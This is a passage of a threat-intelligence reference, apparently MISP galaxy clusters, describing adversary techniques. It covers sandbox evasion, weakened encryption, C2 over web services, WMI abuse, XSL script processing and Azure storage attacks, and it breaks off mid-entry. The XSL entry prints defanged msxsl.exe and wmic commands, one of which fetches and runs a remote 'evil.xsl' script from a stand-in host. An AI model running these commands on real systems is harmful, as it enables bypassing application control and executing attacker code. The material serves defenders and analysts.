Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) during automated discovery to shape follow-on behaviors.<sup>[[Deloitte Environment Awareness](https://app.tidalcyber.com/references/af842a1f-8f39-4b4f-b4d2-0bbb810e6c31)]</sup>

Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a), [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde), [System Information Discovery](https://app.tidalcyber.com/technique/a2961a00-450e-45a5-b293-f699d9f3b4ea), and [Query Registry](https://app.tidalcyber.com/technique/58722f84-b119-45a8-8e29-0065688015ee) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment.

Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size.

Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.<sup>[[McAfee Virtual Jan 2017](https://app.tidalcyber.com/references/a541a027-733c-438f-a723-6f7e8e6f354c)]</sup> In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output.

Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.<sup>[[Unit 42 OilRig Sept 2018](https://app.tidalcyber.com/references/84815940-b98a-4f5c-82fe-7d8bf2f51a09)]</sup>

The tag is: misp-galaxy:technique="System Checks"

Time Based Evasion

Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.

Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://app.tidalcyber.com/technique/e54bdb49-6039-4048-9be6-657a7ff3e071) to avoid analysis and scrutiny.<sup>[[Deloitte Environment Awareness](https://app.tidalcyber.com/references/af842a1f-8f39-4b4f-b4d2-0bbb810e6c31)]</sup>

Benign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as [Ping](https://app.tidalcyber.com/software/4ea12106-c0a1-4546-bb64-a1675d9f5dc7)s, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.<sup>[[Revil Independence Day](https://app.tidalcyber.com/references/d7c4f03e-7dc0-4196-866b-c1a8eb943f77)]</sup><sup>[[Netskope Nitol](https://app.tidalcyber.com/references/94b5ac75-1fd5-4cad-a604-2b09846eb975)]</sup> Another variation, commonly referred to as API hammering, involves making various calls to [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions in order to delay execution (while also potentially overloading analysis environments with junk data).<sup>[[Joe Sec Nymaim](https://app.tidalcyber.com/references/fe6ac288-1c7c-4ec0-a709-c3ca56e5d088)]</sup><sup>[[Joe Sec Trickbot](https://app.tidalcyber.com/references/f5441718-3c0d-4b26-863c-24df1130b090)]</sup>

Adversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment’s timestamp before and after execution of a sleep function.<sup>[[ISACA Malware Tricks](https://app.tidalcyber.com/references/a071bf02-066b-46e6-a554-f43d0c170807)]</sup>

The tag is: misp-galaxy:technique="Time Based Evasion"

User Activity Based Checks

Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) during automated discovery to shape follow-on behaviors.<sup>[[Deloitte Environment Awareness](https://app.tidalcyber.com/references/af842a1f-8f39-4b4f-b4d2-0bbb810e6c31)]</sup>

Adversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks <sup>[[Sans Virtual Jan 2016](https://app.tidalcyber.com/references/5d3d567c-dc25-44c1-8d2a-71ae00b60dbe)]</sup> , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro <sup>[[Unit 42 Sofacy Nov 2018](https://app.tidalcyber.com/references/1523c6de-8879-4652-ac51-1a5085324370)]</sup> or waiting for a user to double click on an embedded image to activate.<sup>[[FireEye FIN7 April 2017](https://app.tidalcyber.com/references/6ee27fdb-1753-4fdf-af72-3295b072ff10)]</sup>

The tag is: misp-galaxy:technique="User Activity Based Checks"

Virtualization/Sandbox Evasion

Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) during automated discovery to shape follow-on behaviors.<sup>[[Deloitte Environment Awareness](https://app.tidalcyber.com/references/af842a1f-8f39-4b4f-b4d2-0bbb810e6c31)]</sup>

Adversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.<sup>[[Unit 42 Pirpi July 2015](https://app.tidalcyber.com/references/42d35b93-2866-46d8-b8ff-675df05db9db)]</sup>

The tag is: misp-galaxy:technique="Virtualization/Sandbox Evasion"

Disable Crypto Hardware

Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.

Many network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://app.tidalcyber.com/technique/aa6595d5-1b2e-45a8-8caf-b0968aeab2ba)). <sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>

The tag is: misp-galaxy:technique="Disable Crypto Hardware"

Reduce Key Space

Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.<sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup>

Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.

Adversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) introduced to the system through [Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc) to change the configuration of the device. <sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>

The tag is: misp-galaxy:technique="Reduce Key Space"

Weaken Encryption

Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. <sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup>

Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.

Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc), [Reduce Key Space](https://app.tidalcyber.com/technique/aa6595d5-1b2e-45a8-8caf-b0968aeab2ba), and [Disable Crypto Hardware](https://app.tidalcyber.com/technique/f413afa2-406d-4e8e-a12c-5f1b8ef05d8a), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. <sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>

The tag is: misp-galaxy:technique="Weaken Encryption"

Bidirectional Communication

Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

The tag is: misp-galaxy:technique="Bidirectional Communication"

Dead Drop Resolver

Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).

The tag is: misp-galaxy:technique="Dead Drop Resolver"

One-Way Communication

Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

The tag is: misp-galaxy:technique="One-Way Communication"

Web Service

Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).

The tag is: misp-galaxy:technique="Web Service"

Windows Management Instrumentation

Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [Distributed Component Object Model](https://app.tidalcyber.com/technique/ebc5fabb-5634-49f2-8979-94ea98da114a) (DCOM) and [Windows Remote Management](https://app.tidalcyber.com/technique/c2866fd3-754e-4b40-897a-e73a8c1fcf7b) (WinRM).<sup>[[MSDN WMI](https://app.tidalcyber.com/references/210ca539-71f6-4494-91ea-402a3e0e2a10)]</sup> Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.<sup>[[MSDN WMI](https://app.tidalcyber.com/references/210ca539-71f6-4494-91ea-402a3e0e2a10)]</sup><sup>[[FireEye WMI 2015](https://app.tidalcyber.com/references/135ccd72-2714-4453-9c8f-f5fde31905ee)]</sup>

An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. <sup>[[FireEye WMI SANS 2015](https://app.tidalcyber.com/references/a9333ef5-5637-4a4c-9aaf-fdc9daf8b860)]</sup> <sup>[[FireEye WMI 2015](https://app.tidalcyber.com/references/135ccd72-2714-4453-9c8f-f5fde31905ee)]</sup>

The tag is: misp-galaxy:technique="Windows Management Instrumentation"

XSL Script Processing

Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. <sup>[[Microsoft XSLT Script Mar 2017](https://app.tidalcyber.com/references/7ff47640-2a98-4a55-939a-ab6c8c8d2d09)]</sup>

Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://app.tidalcyber.com/technique/8811114c-a0cf-479c-b95d-c036467749e3), the Microsoft common line transformation utility binary (msxsl.exe) <sup>[[Microsoft msxsl.exe](https://app.tidalcyber.com/references/a25d664c-d109-466f-9b6a-7e9ea8c57895)]</sup> can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. <sup>[[Penetration Testing Lab MSXSL July 2017](https://app.tidalcyber.com/references/2f1adf20-a4b8-48c1-861f-0a44271765d7)]</sup> Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. <sup>[[Reaqta MSXSL Spearphishing MAR 2018](https://app.tidalcyber.com/references/927737c9-63a3-49a6-85dc-620e055aaf0a)]</sup> Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.<sup>[[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)]</sup>

Command-line examples:<sup>[[Penetration Testing Lab MSXSL July 2017](https://app.tidalcyber.com/references/2f1adf20-a4b8-48c1-861f-0a44271765d7)]</sup><sup>[[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)]</sup>

  • <code>msxsl.exe customers[.]xml script[.]xsl</code>

  • <code>msxsl.exe script[.]xsl script[.]xsl</code>

  • <code>msxsl.exe script[.]jpeg script[.]jpeg</code>

Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a) to invoke JScript or VBScript within an XSL file.<sup>[[LOLBAS Wmic](https://app.tidalcyber.com/references/497e73d4-9f27-4b30-ba09-f152ce866d0f)]</sup> This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://app.tidalcyber.com/technique/b1da2b02-9ade-45e0-a795-ec1b19e5316a)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a) provided they utilize the /FORMAT switch.<sup>[[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)]</sup>

  • Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>

  • Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>

The tag is: misp-galaxy:technique="XSL Script Processing"

Threat Matrix for storage services

Microsoft Defender for Cloud threat matrix for storage services contains attack tactics, techniques and mitigations relevant storage services delivered by cloud providers..

Threat Matrix for storage services is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Microsoft - Evgeny Bogokovsky - Ram Pliskin

MS-T801 - Storage account discovery

Attackers may execute active reconnaissance scans to gather storage account names that becomes a potential target. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.

The tag is: misp-galaxy:tmss="MS-T801 - Storage account discovery"

Table 16241. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/storage-account-discovery

MS-T804 - Search engines

Attackers may use search engines to collect information about victim storage accounts that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords such as storage accounts domain names (site:*.blob.core.windows.net)

The tag is: misp-galaxy:tmss="MS-T804 - Search engines"

Table 16242. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/search-engines

MS-T803 - Databases of publicly available storage accounts

Attackers may search public databases for publicly available storage accounts that can be used during targeting.

The tag is: misp-galaxy:tmss="MS-T803 - Databases of publicly available storage accounts"

Table 16243. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/databases-of-public-accounts

MS-T826 - DNS/Passive DNS

Attackers may search for DNS data for valid storage account names that can become potential targets. Threat actors can query nameservers using brute-force technique to enumerate existing storage accounts in the wild, or search through centralized repositories of logged DNS query responses (known as passive DNS).

The tag is: misp-galaxy:tmss="MS-T826 - DNS/Passive DNS"

Table 16244. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/dns-passive-dns

MS-T805 - Victim-owned websites

Attackers may look for storage accounts of a victim enterprise by searching its websites. Victim-owned website pages may be stored on a storage account or contain links to retrieve data stored in a storage account. The links contain the URL of the storage and provide an entry point into the account.

The tag is: misp-galaxy:tmss="MS-T805 - Victim-owned websites"

Table 16245. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/victim-owned-websites

MS-T814 - Valid SAS token

A shared access signature (SAS) is a token, that is appended to the a uniform resource identifier (URI) for a storage resource, that grants restricted access rights over the associated resource in your storage account. Attackers may get a SAS token using one of the Credential Access techniques or during the reconnaissance process through social engineering.

The tag is: misp-galaxy:tmss="MS-T814 - Valid SAS token"

Table 16246. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/valid-sas-token

MS-T815 - Valid shared key

Attackers may get a shared key using one of Credential Access techniques or capture one earlier in their reconnaissance process through social engineering to gain initial access. Adversaries may leverage keys left in source code or configuration files. Sophisticated attackers may also obtain keys from hosts (virtual machines) that have mounted File Share on their system (SMB). Shared key provides unrestricted permissions over all data plane operations.

The tag is: misp-galaxy:tmss="MS-T815 - Valid shared key"

Table 16247. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/valid-shared-key

MS-T816 - Authorized principal account

Attackers may steal account credentials using one of the credential access techniques or capture an account earlier in their reconnaissance process through social engineering to gain initial access. An authorized principal account can result in full control of storage account resources.

The tag is: misp-galaxy:tmss="MS-T816 - Authorized principal account"

Table 16248. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/authorized-principal-account

MS-T817 - Anonymous public read access

Attackers may leverage publicly exposed storage accounts to list containers/blobs and their properties. Azure Storage supports optional anonymous public read access for containers and blobs. By default, anonymous access to your data is never permitted. Unless you explicitly enable anonymous access, all requests to a container and its blobs must be authorized. When you configure a container’s public access level setting to permit anonymous access, clients can read data in that container without authorizing the request.

The tag is: misp-galaxy:tmss="MS-T817 - Anonymous public read access"

Table 16249. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/anonymous-public-read-access

MS-T825 - SFTP credentials

Attackers may obtain and abuse credentials of an SFTP account as a means of gaining initial access. SFTP is a prevalent file transfer protocol between a client and a remote service. Once the user connects to the cloud storage service, the user can upload and download blobs and perform other operations that are supported by the protocol. SFTP connection requires SFTP accounts which are managed locally in the storage service instance, including credentials in a form of passwords or key-pairs.

The tag is: misp-galaxy:tmss="MS-T825 - SFTP credentials"

Table 16250. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/sftp-credentials

MS-T827 - NFS access

Attackers may perform initial access to a storage account using NFS protocol where enabled. While access is restricted to a list of allowed virtual networks that are configured on the storage account firewall, connection via NFS protocol does not require authentication and can be performed by any source on the specified networks.

The tag is: misp-galaxy:tmss="MS-T827 - NFS access"

Table 16251. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/nfs-access

MS-T828 - SMB access

Attackers may perform initial access to a storage account file shares using Server Message Block (SMB) protocol.

The tag is: misp-galaxy:tmss="MS-T828 - SMB access"

Table 16252. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/smb-access

MS-T840 - Object replication

Attackers may set a replication policy between source and destination containers that asynchronously copies objects from source to destination. This feature can be maliciously misused in both directions. Outbound replication can serve as an exfiltration channel of customer data from the victim’s container to an adversary’s container. Inbound replication can be used to deliver malware from an adversary’s container to a victim’s container. After the policy is set, the attacker can operate on their container without accessing the victim container.

The tag is: misp-galaxy:tmss="MS-T840 - Object replication"

Table 16253. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/object-replication

MS-T813 - Firewall and virtual networks configuratioin changes

Attackers may disable firewall protection or set additional firewall rules to masquerade their access channel. Azure Storage offers a set of built-in network access features. Administrators can leverage these capabilities to restrict access to storage resources. Restriction rules can operate at the IP level or VNet IDs. When network rules are configured, only requests originated from authorized subnets will be served.

The tag is: misp-galaxy:tmss="MS-T813 - Firewall and virtual networks configuratioin changes"

Table 16254. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/firewall-configuration-changes

MS-T808 - Role-based access control permission

Storage services offer built-in RBAC roles that encompass sets of permissions used to access different data types. Definition of custom roles is also supported. Upon assignment of an RBAC role to an identity object (like Azure AD security principal) the storage provider grants access to that security principal. Attackers may leverage the RBAC mechanism to ensure persistent access to their owned identity objects.

The tag is: misp-galaxy:tmss="MS-T808 - Role-based access control permission"

Table 16255. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/rbac-permission

MS-T806 - Create SAS token

Attackers may create a high-privileged SAS token with long expiry to preserve valid credentials for a long period. The tokens are not monitored by storage accounts thus they cannot be revoked (except Service SAS) and it’s not easy to determine whether there are valid tokens in the wild until they are used.

The tag is: misp-galaxy:tmss="MS-T806 - Create SAS token"

Table 16256. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/create-sas-token

MS-T807 - Container access level property

Attackers may adjust the container access level property at the granularity of a blob or container, to permit anonymous read access to data in the storage account. This configuration secures a channel to exfiltrate data even if the initial access technique is no longer valid.

The tag is: misp-galaxy:tmss="MS-T807 - Container access level property"

Table 16257. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/container-access-level-property

MS-T809 - SFTP account

Attackers may create an SFTP account to maintain access to a target storage account. The SFTP account is local on the storage instance and is not subject to Azure RBAC permissions. The account is also unaffected in case of storage account access keys rotation.

The tag is: misp-galaxy:tmss="MS-T809 - SFTP account"

Table 16258. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/sftp-account

MS-T830 - Trusted Azure services

Attackers may configure the storage account firewall to allow access by trusted Azure services. Azure Storage provides a predefined list of trusted services. Any resource from that list that belongs to the same subscription as the storage account is allowed by the firewall even if there is no firewall rule that explicitly permits the source address of the resource.

The tag is: misp-galaxy:tmss="MS-T830 - Trusted Azure services"

Table 16259. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/trusted-azure-services

MS-T829 - Trusted access based on a managed identity

Attackers may configure the storage account firewall to allow access by specific resource instances based on their system-assigned managed identity, regardless of their source address. The resource type can be chosen from a predefined list provided by Azure Storage, and the resource instance must be in the same tenant as the storage account. The RBAC permissions of the resource instance determine the types of operations that a resource instance can perform on storage account data.

The tag is: misp-galaxy:tmss="MS-T829 - Trusted access based on a managed identity"

Table 16260. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/trusted-access-managed-identity

MS-T812 - Private endpoint

Attackers may set private endpoints for a storage account to establish a separate communication channel from a target virtual network. The new endpoint is assigned with a private IP address within the virtual network’s address range. All the requests sent to the private endpoint bypass the storage account firewall by design.

The tag is: misp-galaxy:tmss="MS-T812 - Private endpoint"

Table 16261. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/private-endpoint

MS-T841 - Storage data clone

Storage services offer different types of cloning or backup data stored on them. Attackers may abuse these built-in capabilities to steal sensitive documents, source code, credentials, and other business crucial information.

The tag is: misp-galaxy:tmss="MS-T841 - Storage data clone"

Table 16262. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/storage-data-clone

MS-T831 - Data transfer size limits

Attackers may fragment stolen information and exfiltrate it on different size chunks to avoid being detected by triggering potentially predefined transfer threshold alerts.

The tag is: misp-galaxy:tmss="MS-T831 - Data transfer size limits"

Table 16263. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/data-transfer-size-limits

MS-T832 - Automated exfiltration

Attackers may exploit legitimate automation processes, predefined by the compromised organization, with the goal of having their logging traces blend in normally within the company’s typical activities. Assimilating or disguising malicious intentions will keep adversary actions, such as data theft, stealthier.

The tag is: misp-galaxy:tmss="MS-T832 - Automated exfiltration"

Table 16264. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/automated-exfiltration

MS-T810 - Disable audit logs

Attackers may disable storage account audit logs to prevent event tracking and avoid detection. Audit logs provide a detailed record of operations performed on a target storage account and may be used to detect malicious activities. Thus, disabling these logs can leave a resource vulnerable to attacks without being detected.

The tag is: misp-galaxy:tmss="MS-T810 - Disable audit logs"

Table 16265. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/disable-audit-logs

MS-T811 - Disable cloud workload protection

Attackers may disable the cloud workload protection service which raises security alerts upon detection of malicious activities in cloud storage services.

The tag is: misp-galaxy:tmss="MS-T811 - Disable cloud workload protection"

Table 16266. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/disable-protection-service

MS-T833 - Operations across geo replicas

Attackers may split their requests across geo replicas to reduce the footprint in each region and avoid being detected by various rules and heuristics.

The tag is: misp-galaxy:tmss="MS-T833 - Operations across geo replicas"

Table 16267. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/operations-across-geo-replicas

MS-T818 - Access key query

Attackers may leverage subscription/account-level access to gather storage account keys and use these keys to authenticate at the resource level. This technique exhibits cloud resource pivoting in combination with control management and data planes. Adversaries can query management APIs to fetch primary and secondary storage account keys.

The tag is: misp-galaxy:tmss="MS-T818 - Access key query"

Table 16268. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/access-key-query

MS-T834 - Cloud shell profiles

Cloud Shell is an interactive, authenticated, browser-accessible shell for managing cloud resources. It provides the flexibility of shell experience, either Bash or PowerShell. To support the Cloud Shell promise of being accessible from everywhere, Cloud Shell profiles and session history are saved on storage account. Attackers may leverage the legitimate use of Cloud Shell to impersonate account owners and potentially obtain additional secrets logged as part of session history.

The tag is: misp-galaxy:tmss="MS-T834 - Cloud shell profiles"

Table 16269. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/cloud-shell-profiles

MS-T819 - Unsecured communication channel

Attackers may sniff network traffic and capture credentials sent over an insecure protocol. When Storage account is configured to support unencrypted protocol such as HTTP, credentials are passed over the wire unprotected and are susceptible to leakage. The attacker can use the compromised credentials to gain initial access to the storage account.

The tag is: misp-galaxy:tmss="MS-T819 - Unsecured communication channel"

Table 16270. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/unsecured-communication-channel

MS-T820 - Storage service discovery

Attackers may leverage access permission to explore the stored objects in the storage account. Tools witnessed, at the reconnaissance phase, are oftentimes used toward this post-compromise information-gathering objective, now with authorization to access storage APIs, such as the List Blobs call.

The tag is: misp-galaxy:tmss="MS-T820 - Storage service discovery"

Table 16271. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/storage-service-discovery

MS-T835 - Account configuration discovery

Attackers may leverage control plane access permission to retrieve the storage account configuration. The configuration contains various technical details that may assist the attacker in implementing a variety of tactics. For example, firewall configuration provides network access information. Other parameters may reveal whether access operations are logged. The configuation may also contain the backup policy that may assist the attacker in performing data destruction.

The tag is: misp-galaxy:tmss="MS-T835 - Account configuration discovery"

Table 16272. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/account-configuration-discovery

MS-T821 - Malicious content upload

